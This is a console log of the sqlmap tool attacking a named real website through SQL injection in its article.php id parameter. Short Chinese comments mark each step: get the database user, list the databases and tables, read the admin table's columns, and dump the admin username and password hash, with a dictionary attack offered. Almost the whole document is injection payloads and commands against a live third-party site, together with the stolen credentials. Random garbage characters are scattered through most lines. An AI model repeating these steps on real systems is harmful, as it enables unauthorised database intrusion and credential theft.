D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
( L8 x- T7 {- S) Y* N& S5 t, Jms "Mysql" --current-user /* 注解:获取当前用户名称. L5 ` y, Q0 A; M
sqlmap/0.9 - automatic SQL injection and database takeover tool# N- K, J3 E# O, f1 u
http://sqlmap.sourceforge.net starting at: 16:53:54
- B+ n# m& I4 ]9 x% l[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
1 f( Z+ w) b0 k8 r/ a r session file
G. `/ D6 I- s% \+ U" e$ M8 z! }[16:53:54] [INFO] resuming injection data from session file
. t. H# u" q1 \0 S6 o[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 u- F: s" ?7 Q" k( K4 J# U[16:53:54] [INFO] testing connection to the target url
- z8 ]$ I+ K1 z: g; W$ Q+ msqlmap identified the following injection points with a total of 0 HTTP(s) reque+ X8 n7 f# i/ c, h: b! F# B$ g
sts:
- h( d0 D" U8 R1 R7 X4 y9 s" L---
- E# a! I7 P! Z2 _' u' {% CPlace: GET! C& G* n; f* y9 Y9 J1 G
Parameter: id; m% R- Q! R5 R/ d. X+ Q/ j
Type: boolean-based blind N. D6 D' `# F( _7 C
Title: AND boolean-based blind - WHERE or HAVING clause0 B3 d) s- D5 A4 h0 d
Payload: id=276 AND 799=7999 J! [. @, ?1 ] q7 b# M
Type: error-based
& {4 {' P) Q F& k; d1 C- Y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' T3 E" k+ r5 N, o
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; P$ A$ T" P! d/ L: s/ u, S. J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! `% g1 u" M: D/ L),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& h1 T1 N6 D% m( p
Type: UNION query; v6 M$ R: w" `& H& t0 Z: z
Title: MySQL UNION query (NULL) - 1 to 10 columns
% ?5 K, H" z3 f9 P; E3 p- w1 q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 t. c2 C( C9 c# P0 H% g' U X
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ ?5 y! f; ]7 r5 ~2 Y R2 lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ n R- G' b9 I; ?( L; X
Type: AND/OR time-based blind% `, W& L R! y/ ?
Title: MySQL > 5.0.11 AND time-based blind5 n* I- f8 ?& P; ^" R( _
Payload: id=276 AND SLEEP(5)+ I# ]2 {8 k& Z
---3 z9 I4 }# v1 L5 P: A& z9 }
[16:53:55] [INFO] the back-end DBMS is MySQL( @/ D& U b1 `) u/ l
web server operating system: Windows
# O6 S. X# l4 }0 r/ I8 e2 s/ }web application technology: Apache 2.2.11, PHP 5.3.0
0 ^ A7 `! n" Y* h8 O2 cback-end DBMS: MySQL 5.0& D, y$ Q; B; \( {4 y. V: X
[16:53:55] [INFO] fetching current user- p) d5 q) }, r% J- f3 f- X
current user: 'root@localhost'
/ P& s4 ]; Q7 n% {" D3 K[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% P; ^# w [! Y, D% Vtput\www.wepost.com.hk' shutting down at: 16:53:58$ u9 F9 E+ o0 W- y- C
4 b8 B& k! P0 Y6 N' \5 T" oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 G) b9 G( q* nms "Mysql" --current-db /*当前数据库/ }1 Z: m) b, U1 A* `
sqlmap/0.9 - automatic SQL injection and database takeover tool7 C( u* ]) R) U$ f
http://sqlmap.sourceforge.net starting at: 16:54:16
, c( [! f2 N2 c# m. X[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as G7 ^. k# m$ }0 L& _* i; `! P
session file, ^- Y( o" s8 r- n% ?- N& d4 ?6 ]
[16:54:16] [INFO] resuming injection data from session file$ j" ?# C! k) O* L' K" b. p" g
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file0 I& m$ w9 V; ]7 ?, @
[16:54:16] [INFO] testing connection to the target url0 L/ e$ }% d9 B% G+ Z1 F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 y7 y$ e n5 U4 P* L& @
sts:4 S8 u" y6 m9 e7 F/ w/ G0 O/ X! _
---, _ i6 h7 y$ x' R# t
Place: GET- s' {% g. R8 ~ B/ {; {, s
Parameter: id% t% Y- Y, s6 J& g, w0 Y
Type: boolean-based blind9 h; I1 m7 z9 t" D, M9 J6 T
Title: AND boolean-based blind - WHERE or HAVING clause5 u# u }" t, c2 J% T- T, X1 g
Payload: id=276 AND 799=7997 b- n2 _& N' r8 D( ]/ ]
Type: error-based/ {$ L% b4 ]0 ~
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ D0 {( x- z+ k* \
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
) n* x y: n. p& S8 q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 S1 v1 [8 n" }5 ?7 d! x
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 Q; f) m& ]/ Y' {' D& z: ] Type: UNION query$ C% w9 Q" j! M) F0 y
Title: MySQL UNION query (NULL) - 1 to 10 columns, U! d2 o* _& L, o
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 p! N% @; c, O/ C
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ W/ F) h$ Y. \
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 m% @3 z5 X5 k
Type: AND/OR time-based blind
# l: X; P3 R4 D+ \ Title: MySQL > 5.0.11 AND time-based blind
9 b: |" v, y' K0 p$ U& B" s- }+ A Payload: id=276 AND SLEEP(5)7 s1 S# @& s/ Q) n
---
1 |9 q0 W0 v6 v; ]1 e[16:54:17] [INFO] the back-end DBMS is MySQL
( L" b3 r. c9 E4 D/ t! `" B2 {9 ~- v/ Sweb server operating system: Windows
. p. ?0 j) m5 M( r( aweb application technology: Apache 2.2.11, PHP 5.3.0; i7 k0 Z6 w9 u
back-end DBMS: MySQL 5.0
& P8 R; E& q% g[16:54:17] [INFO] fetching current database& U1 s4 P. U4 G- r+ V: K3 j
current database: 'wepost'
0 h8 U1 C9 |- a7 l) q0 P$ V[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' s6 \2 X0 U3 M0 a. j$ K1 m
tput\www.wepost.com.hk' shutting down at: 16:54:18
N A4 H3 j$ ~8 _; ]! S( BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' p$ p: \9 `# D8 H% w: Lms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
1 [8 ~- Y L/ n5 z# U$ N! a sqlmap/0.9 - automatic SQL injection and database takeover tool
3 I7 Y f) E( I* ~- I* q http://sqlmap.sourceforge.net starting at: 16:55:25
( q5 o* q9 p! Q0 H8 `- q" M0 z! I7 n2 Q[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
7 ?1 y; T, ?- E5 m3 v' ?9 c session file4 ` k: q( a2 C, c+ N8 t% l5 D
[16:55:25] [INFO] resuming injection data from session file7 @1 G, I% A+ s3 f
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. m4 Y- @/ y ]6 t
[16:55:25] [INFO] testing connection to the target url+ P) {; i, T) G4 K1 o
sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 b- y7 q% {1 O7 I# f
sts:" m/ {6 a' m) v# @2 t
---
$ G1 x; W( m$ O9 f& LPlace: GET
1 N3 o- z3 n3 O7 \9 o1 v1 Y/ g$ y6 rParameter: id w0 S ?+ p, Y/ E
Type: boolean-based blind
, P% P m' o" \4 J" z7 ^ Title: AND boolean-based blind - WHERE or HAVING clause
% J- r* L4 t* |4 Z+ p Payload: id=276 AND 799=7998 a' Q4 M6 v- u
Type: error-based
/ z1 a% e) b# A Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* _! x5 k+ m9 M) e! {5 P
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ }! K4 d* C! B+ r
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' n7 Y3 q' H. W r p% D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# { w" E6 \5 P3 @ Type: UNION query
p0 P. u# H- z- X8 L4 z Title: MySQL UNION query (NULL) - 1 to 10 columns
5 B- `, t/ R$ w4 @& v7 Y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( Z; t' T& P, l y6 ]+ U! L
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 l# y5 D( a& ~+ DCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: _% c0 U& J" k# u& g6 s3 `7 y5 {
Type: AND/OR time-based blind
3 M; t, f7 ~/ V, n4 [' K# r9 L1 g Title: MySQL > 5.0.11 AND time-based blind9 j6 b& {+ x) v% d
Payload: id=276 AND SLEEP(5)
* V5 T8 j. m& S' a1 O---
8 B2 ?% c- ]$ g8 y8 G[16:55:26] [INFO] the back-end DBMS is MySQL, I3 ^ V4 o( C' c( g! M$ w
web server operating system: Windows. X* y1 V" }; z& X. {. c
web application technology: Apache 2.2.11, PHP 5.3.0
* p# T* R! c) W5 d5 vback-end DBMS: MySQL 5.0
- T3 T- A m2 j5 S3 Z/ t[16:55:26] [INFO] fetching tables for database 'wepost'
; E. `8 z- u3 U1 k1 @0 s* w[16:55:27] [INFO] the SQL query used returns 6 entries/ y2 z) I4 U' D3 \
Database: wepost: G; c1 ~5 A0 k; v, E/ n
[6 tables]
2 f+ g# H- ~- `/ o# U+-------------+
0 t% S6 [- U+ O9 `| admin |$ A, r% i( `1 H' o! A( T- u j
| article |
6 M* V1 h" ^7 m8 d' \# o: m| contributor |
" |8 X; t. e" f. L& o| idea |
7 Y" u4 A* {% P& C2 L| image |/ A( y* _+ G! K r( p$ z+ F
| issue |& X/ e6 T3 c. l9 {
+-------------+" e6 ?& g! l1 B& O* f, I9 V! e
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 U) Z* t. ^( U' V/ G* xtput\www.wepost.com.hk' shutting down at: 16:55:33
9 r2 ?6 j) O% |# ]8 M/ i
% Y4 A0 S9 B; o& O* V7 T9 }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& s3 A5 o% M1 K6 I4 p" r) P; c- u
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名1 m3 R* I; Q: D. c& N# f: f
sqlmap/0.9 - automatic SQL injection and database takeover tool
% i: {8 P1 F6 {4 C3 _0 ` http://sqlmap.sourceforge.net starting at: 16:56:06" f( W+ m7 F O) c$ N3 V( p
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ H. u$ }+ V* _- N' Y) G2 `: K/ [1 f7 O9 K6 Jsts:
( \! @! B7 J' i$ G% g---
' ], p4 L# o; y1 DPlace: GET4 K% r& H4 p0 W l( T
Parameter: id3 X8 x5 B% y: J
Type: boolean-based blind' P0 O& u$ c- D) l8 U
Title: AND boolean-based blind - WHERE or HAVING clause
5 y( v5 N# _- F" j4 n Payload: id=276 AND 799=799; q) C" S; s3 M5 t L: g! p; b, }7 w
Type: error-based, f4 k$ k' V) z( L- ^7 Y7 v
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 H i p5 H2 d' E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, o7 _: I" ?, X; n$ F* a
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* B) Z& x- I: ^+ |7 V; }# k),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 a- T% ?& o8 G- u$ }1 r' i. y7 g
Type: UNION query- w8 a, U7 J) r" }$ h
Title: MySQL UNION query (NULL) - 1 to 10 columns, D( N7 J5 W& ~
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 |, k) V k8 p* h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 D5 S3 W( t# L% ~CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. }( s: e0 O( H4 G+ F* ^3 ~
Type: AND/OR time-based blind
0 m; W" B$ R. I# Y5 ` c! Z Title: MySQL > 5.0.11 AND time-based blind4 f7 t" R; D6 O! }7 G3 x) D
Payload: id=276 AND SLEEP(5)- ] J }0 D7 T$ @, x
---0 r) ^* Q! I T) T1 ~* R
web server operating system: Windows. X5 u' B" ~& T$ l; [' Z* J
web application technology: Apache 2.2.11, PHP 5.3.0: ?. O% Y+ c5 P# F
back-end DBMS: MySQL 5.0; f' p' H" I' P: z7 g
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
4 T: J& i2 R; l0 \' G6 Mssion': wepost, wepost( `0 ^' _% W( E& e
Database: wepost
# P8 m, Y# V+ ETable: admin9 J1 q8 [! ^, F/ n3 X- G" _# S
[4 columns]8 @9 j/ I3 b2 g4 R9 E# R
+----------+-------------+
/ ~- [" \! m# Q$ g| Column | Type |' Q3 E$ S* ~5 k7 k
+----------+-------------+
& I4 {3 T C2 Z, W| id | int(11) |
; n# t( r% W. B, f, V| password | varchar(32) |
4 Q! T$ k# X+ m3 {: p! I! X$ ~ C| type | varchar(10) |
( G, o1 s# z8 U! {! I, i| userid | varchar(20) |
1 c' V" h2 y8 L; E+----------+-------------+9 Z! M, W, [: `" [3 W
shutting down at: 16:56:19
; M# V; m g# P3 ?4 F! f% i% w0 D' h) ?( [5 r6 w
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' n2 V4 [* O. g9 Ams "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
~ j; m# N! K+ K, w4 a sqlmap/0.9 - automatic SQL injection and database takeover tool- O7 Z) C+ Y8 ]& {' l4 l
http://sqlmap.sourceforge.net starting at: 16:57:14) c) _8 H; r8 f' {$ e$ Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. l3 a- K. p* q2 z' H) q; Z4 N
sts:
, Z: r0 E1 C1 V( _) o' L---4 N" r1 g: U2 o( o' B, o
Place: GET- u b$ E/ c# g- D
Parameter: id
# [+ {7 L5 z0 t( n2 N0 k Type: boolean-based blind
+ I- v; w& R2 `- T Title: AND boolean-based blind - WHERE or HAVING clause% Z( `% K; T- o" N; V- Q. L
Payload: id=276 AND 799=799) l2 _0 L% o, ~3 z+ L; z
Type: error-based; w+ C. c# Y; F7 c4 l" B; ^
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ k" ]- M$ Q6 d% H" \- o/ _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) R; V3 A' U3 X6 k% B
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 Z9 {( e4 ~$ L1 x- \' R
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ b8 \* ~7 Q0 p
Type: UNION query N7 ]4 q3 T8 t/ B
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 A/ f2 c$ Z. z; E Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, n6 H3 d1 d" @; j7 }$ d+ y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& V& B7 H/ ?. B9 S, XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) L. l/ |5 z7 N( r, M
Type: AND/OR time-based blind) N) T% v( F$ v' B: Q
Title: MySQL > 5.0.11 AND time-based blind4 ]- z: _6 \5 C5 n" T
Payload: id=276 AND SLEEP(5)
9 I( r- {( U- ]% ?---% i* U2 t) w2 o0 l: R
web server operating system: Windows% u' j& d0 N* h9 r, t3 [ ^7 a1 b t
web application technology: Apache 2.2.11, PHP 5.3.0
% @, ^, {' N* o# P; d; Zback-end DBMS: MySQL 5.0
; f0 T# K' o9 u& [: Q# t7 I; krecognized possible password hash values. do you want to use dictionary attack o5 o- U0 ^8 w- n- ]# c
n retrieved table items? [Y/n/q] y, v6 }% a( U+ {" W3 n0 O
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
7 L: X: ?4 ]+ g. u3 {, q0 Pdo you want to use common password suffixes? (slow!) [y/N] y$ g2 p" Z5 h! z9 r, w0 l
Database: wepost( h) o; ?" T6 e- Z: O
Table: admin. k4 r$ U) X% S3 m
[1 entry]. ]$ I% y6 I2 X* C! ~6 ~+ A
+----------------------------------+------------+
4 [! o) R; {7 \& A3 g| password | userid |
N9 \" v' y) S8 ~- c+----------------------------------+------------+8 ~6 T0 z. c! ?- |4 |9 @" |& W
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |' q% @1 r' `& r; O
+----------------------------------+------------+5 N3 q- [. j: z
shutting down at: 16:58:14
7 x0 ^5 F! l! b9 l8 L- }" M e1 M
D:\Python27\sqlmap> |